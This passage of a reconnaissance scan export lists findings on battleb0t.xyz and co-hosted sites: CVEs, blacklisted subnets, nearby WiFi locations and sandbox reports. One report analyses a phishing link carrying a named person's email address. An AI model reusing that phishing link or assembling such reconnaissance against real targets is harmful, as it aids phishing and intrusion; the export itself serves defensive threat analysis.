"https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "lu.ma/y9yw6eqo"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.188.8"\n "UDP connection to 142.250.191.78"\n "UDP connection to 108.139.1.104"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7888_266005712\\adblock_snippet.js]- [targetUID: 00000000-00007888]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.44" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.44"\n Potential IP "10.34.0.44" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.44\\LICENSE"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.241.73"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/86 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'641c61a4603a681d33001968', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspiciou | 185.199.109.153 |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01010101coder.github.io |
| 2023-05-12 02:53:56 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T02:29:53.974Z", "ip": "2606:50c0:8001::153", "location_updated_at": "2023-05-09T09:29:28.098368Z", "autonomous_system_updated_at": "2023-05-09T09:29:28.098483Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"sweden.trans.healthcare": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:44:54.814877641Z"}, "www.sankalpsociety.in": {"record_type": "CNAME", "resolved_at": "2023-03-30T03:30:37.790561757Z"}, "alexsong.group": {"record_type": "AAAA", "resolved_at": "2023-04-07T17:20:01.599322255Z"}, "www.honestfarmer.in": {"record_type": "CNAME", "resolved_at": "2023-03-18T23:46:54.581846631Z"}, "caya-gutenberg.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-14T00:28:27.380989688Z"}, "fe.youyu.im": {"record_type": "CNAME", "resolved_at": "2023-03-05T16:23:47.675585567Z"}, "navi-baum-demo.giang-nguyen.com": {"record_type": "CNAME", "resolved_at": "2023-05-11T14:50:15.129872931Z"}, "www.consciouscamping.ie": {"record_type": "CNAME", "resolved_at": "2023-02-11T15:09:56.324722295Z"}, "danzetsu.biscuitt.in": {"record_type": "CNAME", "resolved_at": "2023-02-25T16:55:06.993306904Z"}, "blog.belsky.in": {"record_type": "CNAME", "resolved_at": "2023-03-30T03:27:06.776036239Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "www.aidbots.in": {"record_type": "CNAME", "resolved_at": "2023-04-11T18:20:04.915692018Z"}, "git.fred.im": {"record_type": "CNAME", "resolved_at": "2023-05-03T00:50:36.751035867Z"}, "www.arvindmehra.in": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:49:19.612171098Z"}, "www.chidkenuprarthanamandhira.in": {"record_type": "CNAME", "resolved_at": "2023-03-21T18:25:37.270541573Z"}, "sh11thead.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-08T13:53:23.227857044Z"}, "mint.gaiaprotocol.com": {"record_type": "CNAME", "resolved_at": "2023-05-07T14:38:55.332333650Z"}, "shashank.im": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:49:01.992957477Z"}, "www.labyr.in": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:43:44.082390542Z"}, "blog.xcatliu.com": {"record_type": "CNAME", "resolved_at": "2023-04-20T19:54:04.742624347Z"}, "guaifish.com": {"record_type": "CNAME", "resolved_at": "2023-02-24T13:51:15.431279411Z"}, "trantuanminh.com": {"record_type": "AAAA", "resolved_at": "2023-04-26T16:50:40.377931396Z"}, "tgd.telecomnancy.net": {"record_type": "CNAME", "resolved_at": "2023-04-23T20:23:42.968388426Z"}, "student.mathsoc.ie": {"record_type": "CNAME", "resolved_at": "2023-03-04T16:27:35.884914874Z"}, "championash5357.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-22T17:12:10.247998776Z"}, "chaos-cl.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-17T16:27:07.483105509Z"}, "www.iapt2.ru": {"record_type": "CNAME", "resolved_at": "2023-04-18T21:11:09.936338632Z"}, "xiongwen7.cn": {"record_type": "CNAME", "resolved_at": "2023-02-26T12:45:30.176581622Z"}, "space.dejvoss.cz": {"record_type": "CNAME", "resolved_at": "2022-09-24T15:17:43.470867813Z"}, "www.eofis.ie": {"record_type": "CNAME", "resolved_at": "2023-04-16T05:04:10.745054368Z"}, "www.effirod.in": {"record_type": "CNAME", "resolved_at": "2023-04-20T21:10:19.519636869Z"}, "blog.zheng.im": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:44:46.778861543Z"}, "www.yeezhang.im": {"record_type": "CNAME", "resolved_at": "2023-03-05T16:24:05.360687550Z"}, "www.croissantdao.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T14:18:31.428677841Z"}, "domlet.richplastow.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:55:59.508294762Z"}, "www.servermaya.web.id": {"record_type": "CNAME", "resolved_at": "2023-04-01T19:01:32.988717568Z"}, "decarola.lifesheets.app": {"record_type": "CNAME", "resolved_at": "2023-03-19T21:38:09.336334894Z"}, "www.get1mil.com": {"record_type": "CNAME", "resolved_at": "2023-03-07T13:53:16.151398146Z"}, "www.megalomania.icu": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:50:15.076942224Z"}, "montecarlo.mardh.eu": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:12:54.462076635Z"}, "polothil.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:13:36.027155340Z"}, "blog2.foxcii.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:20:31.600174494Z"}, "www.fx-businessintelligence.com": {"record_type": "CNAME", "resolved_at": "2022-11-03T13:15:19.928479843Z"}, "https://jaxyouthsurvey.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-18T16:09:45.376363389Z"}, "q42.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T21:14:14.876154310Z"}, "www.corefindings.com": {"record_type": "CNAME", "resolved_at": "2023-04-25T14:30:24.633859334Z"}, "blog.s-schoener.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T16:33:37.322972528Z"}, "www.gilsoffer.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:22:12.068548907Z"}, "www.frontendtesting.com": {"record_type": "CNAME", "resolved_at": "2023-03-04T14:07:21.806350891Z"}, "www.forexforyou.co.in": {"record_type": "CNAME", "resolved_at": "2022-12-18T14:45:47.847480431Z"}, "www.parmosense.jp": {"record_type": "CNAME", "resolved_at": "2023-05-01T17:45:06.831576093Z"}, "www.openpoint.ie": {"record_type": "CNAME", "resolved_at": "2023-04-26T18:20:10.169998436Z"}, "docs.cashwarden.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T00:14:00.447731445Z"}, "www.kattamzero.in": {"record_type": "CNAME", "resolved_at": "2022-12-22T14:48:29.799597358Z"}, "cbrcrtx.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-27T16:15:18.542745453Z"}, "youge.icu": {"record_type": "CNAME", "resolved_at": "2023-03-22T11:26:45.995844714Z"}, "blog.ciberviler.top": {"record_type": "CNAME", "resolved_at": "2023-05-03T22:00:04.200012079Z"}, "selfcare.reemglasco.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:53:55.389091114Z"}, "www.aksharaa-stories.in": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:01:24.104478961Z"}, "politicadedatos.cdmx.gob.mx": {"record_type": "CNAME", "resolved_at": "2023-04-20T22:14:34.638861478Z"}, "blog.669.icu": {"record_type": "CNAME", "resolved_at": "2023-04-30T23:01:16.804648755Z"}, "www.nino.ie": {"record_type": "CNAME", "resolved_at": "2022-11-15T14:39:48.329300690Z"}, "gtmo.verifyip.dev": {"record_type": "CNAME", "resolved_at": "2023-03-18T04:57:31.930831771Z"}, "dilipmishra.in": {"record_type": "AAAA", "resolved_at": "2023-04-20T09:39:39.449912783Z"}, "www.icrat.org": {"record_type": "CNAME", "resolved_at": "2023-02-24T18:57:48.570890826Z"}, "v2.ook.web.id": {"record_type": "CNAME", "resolved_at": "2023-03-22T18:06:45.316235566Z"}, "webscience.aareet.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T13:10:37.642950908Z"}, "bsrcode.in": {"record_type": "AAAA", "resolved_at": "2023-03-10T15:26:40.826334961Z"}, "chaobai-li.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-21T01:31:06.446449174Z"}, "gennymcdonagh.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-20T01:52:08.452932867Z"}, "apidocs.skycore.com": {"record_type": "CNAME", "resolved_at": "2023-02-24T14:41:26.009078406Z"}, "spirit.javve.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T02:19:30.097488621Z"}, "www.harmlessmachines.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T15:30:55.779483006Z"}, "inwave.ee.iith.ac.in": {"record_type": "CNAME", "resolved_at": "2023-04-30T23:00:58.357496950Z"}, "atf.accmp.co.in": {"record_type": "CNAME", "resolved_at": "2022-10-12T15:02:53.176642383Z"}, "www.cybercell.in": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:50:33.435276887Z"}, "haz.gyb.hu": {"record_type": "CNAME", "resolved_at": "2023-04-03T17:32:33.353464423Z"}, "www.albrt.in": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:50:47.473965264Z"}, "volnt.github.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T12:15:25.538707631Z"}, "www.undef.im": {"record_type": "CNAME", "resolved_at": "2023-03-16T15:22:57.341657363Z"}, "www.jesl.in": {"record_type": "CNAME", "resolved_at": "2023-03-18T23:46:46.131431289Z"}, "www.utopianhealing.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T22:37:02.294230539Z"}, "hstory.cn": {"record_type": "CNAME", "resolved_at": "2023-03-23T13:22:41.980546226Z"}, "pansypotter.gq": {"record_type": "AAAA", "resolved_at": "2023-01-05T15:01:42.622173547Z"}, "www.wsbrunson.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T15:38:39.587595975Z"}, "www.divisionthegame.com": {"record_type": "CNAME", "resolved_at": "2022-11-24T13:19:50.972528321Z"}, "proofcafe.github.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T14:18:15.798052993Z"}, "weather.boff.in": {"record_type": "CNAME", "resolved_at": "2023-04-18T17:20:47.664757665Z"}, "cocoyunxyz.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-18T23:52:21.760457760Z"}, "www.x3pi.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:23:11.859917505Z"}, "cassiehlinka.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-24T16:10:58.121319192Z"}, "chinese.yijun.hu": {"record_type": "CNAME", "resolved_at": "2023-03-07T16:05:40.493292434Z"}, "corporateaward.skoch.in": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:24:29.350893299Z"}, "www.trich.im": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:00:26.714697755Z"}, "go.openset.wang": {"record_type": "CNAME", "resolved_at": "2023-04-13T07:10:38.860870061Z"}, "www.lokjivan.in": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:23:15.353939327Z"}, "fosterinfotech.com": {"record_type": "AAAA", "resolved_at": "2023-04-15T14:30:18.377726429Z"}, "dmitryz.com": {"record_type": "AAAA", "resolved_at": "2023-03-22T10:34:37.477220368Z"}, "www.devondcl.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T14:20:27.865441511Z"}, "www.howtocanada.ru": {"record_type": "CNAME", "resolved_at": "2023-04-19T23:22:52.845993267Z"}}, "names": ["polothil.github.com", "docs.cashwarden.com", "v2.ook.web.id", "alexsong.group", "webscience.aareet.com" | 2606:50c0:8001::153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:11:95:71:3F:FA) | 32.8608, -79.9746 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:85:60) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | funny.battleb0t.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a9:fd:fd:93:70:29:b0:48:11:c8:ce:bf:67:f2:09:f0:18:36:
72:e2:d5:45:1a:22:98:73:7b:fc:63:f5:37:b4:8e:20:c8:45:
e4:ce:e2:9e:72:73:e8:ad:47:bf:c0:35:30:a0:a9:68:42:7b:
af:a0:57:45:fd:5a:91:a4:2e:d5:a2:69:b2:ca:b8:65:ec:5c:
97:2b:5a:c2:47:61:9f:c4:81:87:89:15:e0:4d:14:10:00:57:
de:30:17:e4:75:38:ea:ab:0b:a9:2e:0e:a3:de:bf:1e:49:35:
76:16:95:0e:f2:76:59:a6:60:31:e4:31:da:5e:f7:3d:1a:b6:
45:fb:43:8b:75:fa:55:4a:bf:3c:53:c5:63:68:3b:09:79:60:
3e:59:90:9c:6f:29:ba:5e:2e:69:99:fe:bf:eb:b8:a8:a2:e5:
6a:e1:ab:7d:7b:0c:fc:a2:d8:0c:8f:d2:5f:a3:53:b9:f8:44:
96:05:f5:bc:85:79:5a:77:18:35:7d:ad:c6:2f:17:ce:cc:e8:
15:70:ec:81:d3:7e:77:0e:2a:9b:e5:1b:d9:8c:57:bd:a3:bc:
0a:e0:67:62:79:dd:4b:90:cc:e8:41:75:b0:89:34:3b:68:0e:
36:40:32:41:3e:6c:17:bc:5d:a4:cc:91:d3:38:4a:ce:c8:1b:
ab:60:7c:08
|
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-20677
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.48): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/battleb0t | battleb0t |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 6 | 0 | 1 | 0 | None | skip.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:10:37 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.154:80 | 185.199.108.0/24 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.79 | 34.74.170.74 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000000jihyun.github.io]
https://www.openphish.com/feed.txt | 000000jihyun.github.io |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.194): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | phi (Net ID: 00:06:B1:2D:D2:D1) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | curealty (Net ID: 00:0C:41:49:32:21) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:05:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nuke.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 42 (Net ID: 00:01:03:7C:0D:EE) | 52.3759, 4.8975 |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | benjamin.mckenzie@atimetals.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c04_IE_EarlyTabStart_0x8b0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.66.40.106:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "191.101.3.40:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "llink.to"\n "track.salesflare.com"\n "west.exchserverdata.one"\n "www.guelphcrc.ca"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "CabB51E.tmp" has type "data"- Location: [%TEMP%\\CabB51E.tmp]- [targetUID: 00000000-00002300]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFEEE2751A29384183.TMP" has type "data"- Location: [%TEMP%\\~DFEEE2751A29384183.TMP]- [targetUID: 00000000-00003076]\n "~DFFC90A9F2586EA360.TMP" has type "data"- Location: [%TEMP%\\~DFFC90A9F2586EA360.TMP]- [targetUID: 00000000-00003076]\n "~DFEF4FBE98200F22B4.TMP" has type "data"- Location: [%TEMP%\\~DFEF4FBE98200F22B4.TMP]- [targetUID: 00000000-00003076]\n "~DFE92125FE943442B9.TMP" has type "data"- Location: [%TEMP%\\~DFE92125FE943442B9.TMP]- [targetUID: 00000000-00003076]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "_BCFD0E53-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._BCFD0E51-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C766E17C-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002300]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "PZ85YNQQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PZ85YNQQ.txt]- [targetUID: 00000000-00003076]\n "P9VT4ER8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P9VT4ER8.txt]- [targetUID: 00000000-00003076]\n "QUTHNHLH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QUTHNHLH.txt]- [targetUID: 00000000-00003076]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "EAMNLP61.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EAMNLP61.txt]- [targetUID: 00000000-00003076]\n "benjamin.mckenzie@atimetals_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "II6KA114.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\II6KA114.txt]- [targetUID: 00000000-00003076]\n "B2FNP7N6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B2FNP7N6.txt]- [targetUID: 00000000-00003076]\n "QO8K1B53.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QO8K1B53.txt]- [targetUID: 00000000-00003076]\n "CabB51F.tmp" has type "data"- Location: [%TEMP%\\CabB51F.tmp]- [targetUID: 00000000-00002300]\n "CabC118.tmp" has type "data"- Location: 